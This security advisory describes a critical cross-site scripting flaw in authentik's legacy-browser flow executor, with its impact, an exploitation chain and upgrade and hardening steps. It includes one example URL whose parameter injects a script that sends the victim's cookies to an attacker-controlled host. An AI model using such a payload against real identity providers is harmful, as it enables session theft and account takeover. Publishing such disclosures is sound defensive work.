CVE-2026-42849: authentik Critical XSS in AutosubmitStage (CVSS 9.3)

CVE-2026-42849: authentik XSS in AutosubmitStage

A critical cross-site scripting (XSS) vulnerability tracked as CVE-2026-42849 has been disclosed in authentik, a widely deployed open-source identity provider. With a CVSS v3.1 score of 9.3 (Critical), the flaw is present in the AutosubmitStage component of the Simple Flow Executor (SFE) — a subsystem specifically designed to maintain compatibility with legacy browsers. An attacker who can influence the flow execution context can inject and execute arbitrary JavaScript in the victim's browser session.

The vulnerability was published on June 2, 2026, and affects all authentik versions prior to 2025.12.5 and 2026.2.3, which contain the official patch.

Vulnerability Overview

Technical Details

Root Cause

The Simple Flow Executor (SFE) in authentik was implemented with interface adjustments to improve compatibility with older, legacy browsers. In this context, the AutosubmitStage — which auto-submits authentication flow forms — fails to properly sanitize or encode attacker-influenced input before rendering it into the DOM.

Because the SFE operates in an authentication flow context (often at the login boundary), the XSS surface is pre-authentication and does not require the attacker to hold any valid session or credentials. An attacker who can supply a crafted URL, parameter, or redirect value can inject JavaScript that executes in the context of the authentik login page.

Why This Is Critical

Identity providers occupy a privileged position in enterprise security architecture:

1. Single sign-on (SSO) scope — authentik typically brokers access to dozens or hundreds of downstream applications. Compromising the IdP session gives an attacker access to all connected services.
2. Pre-authentication attack surface — the XSS fires before the user completes login, meaning even cautious users with MFA may be exposed.
3. Credential harvesting — injected scripts can intercept credentials, TOTP codes, or session tokens entered into authentik's login flows.
4. Session fixation / hijacking — stolen session cookies from the IdP allow direct impersonation across all SSO-protected apps.

Exploitation Flow

Attacker crafts malicious URL containing injected script payload
  → Victim follows link (phishing, redirect, stored link)
    → authentik SFE AutosubmitStage renders payload unsanitized
      → JavaScript executes in victim's browser (authentik domain)
        → Session tokens, credentials, or TOTP exfiltrated to attacker
          → Attacker impersonates victim across all SSO-connected apps

Example conceptual injection vector:

https://auth.example.com/if/flow/default-authentication-flow/
  ?next=<script>document.location='https://attacker.com/?c='+document.cookie</script>

The CVSS score of 9.3 reflects:

• Attack Vector: Network — no physical access required
• Attack Complexity: Low — no special conditions needed beyond a crafted link
• User Interaction: Required — victim must access the malicious URL
• Scope: Changed — XSS impacts resources beyond the vulnerable component
• Confidentiality/Integrity Impact: High

Impact Assessment

Affected Versions

Remediation

Immediate Actions

1. Upgrade authentik immediately to 2025.12.5 or 2026.2.3 (or newer). This is the only complete fix.

   # Docker Compose upgrade example
   docker compose pull
   docker compose up -d
    
   # Check current version
   docker exec authentik-server ak version

   Copy

2. Audit active sessions — after upgrading, force session invalidation for any sessions that may have been active during the vulnerability window:

   authentik Admin UI → System → Sessions → Invalidate All
   

   Copy

3. Review authentication flow logs — check authentik access logs for unusual redirect parameters or unexpected external domains in ?next= parameters.

4. Enable Content Security Policy (CSP) — if not already configured, deploy a strict CSP header that limits JavaScript execution sources. authentik's bundled Nginx config supports CSP header injection.

5. Web Application Firewall (WAF) rules — consider deploying WAF rules to detect and block XSS payloads in authentik URL parameters as a temporary defense layer.

Longer-Term Hardening

• Restrict authentik access to internal networks or VPN — reducing the attack surface for phishing-driven XSS exploitation
• Enable authentik's built-in event notifications for login anomalies and unexpected redirect chains
• Rotate OAuth2 client secrets for all downstream applications as a precautionary measure

Context: XSS in Identity Providers

Cross-site scripting vulnerabilities in identity providers carry exceptional risk compared to XSS in ordinary web applications. Because an IdP is explicitly trusted by browsers and downstream applications to issue session tokens and identity assertions, successful exploitation is equivalent to a full account takeover across the entire SSO ecosystem.

The legacy-browser compatibility context of the SFE also highlights a common security tension: maintaining backwards compatibility introduces code paths that may not receive the same security scrutiny as modern code. Organizations operating authentik should treat this patch with the same urgency as a direct authentication bypass.

Key Takeaways

1. CVE-2026-42849 is a CVSS 9.3 critical XSS in authentik's AutosubmitStage — upgrade to 2025.12.5 or 2026.2.3 immediately
2. The pre-authentication attack surface means no valid credentials are required to exploit this flaw
3. Successful exploitation gives attackers access to all SSO-connected applications, not just authentik
4. Legacy browser compatibility code in the SFE introduced the vulnerability — a reminder that backcompat paths require equal security review
5. After patching, invalidate all active sessions and audit authentication flow logs for signs of prior exploitation

Sources

• CVE-2026-42849 — NIST NVD
• authentik Security Advisories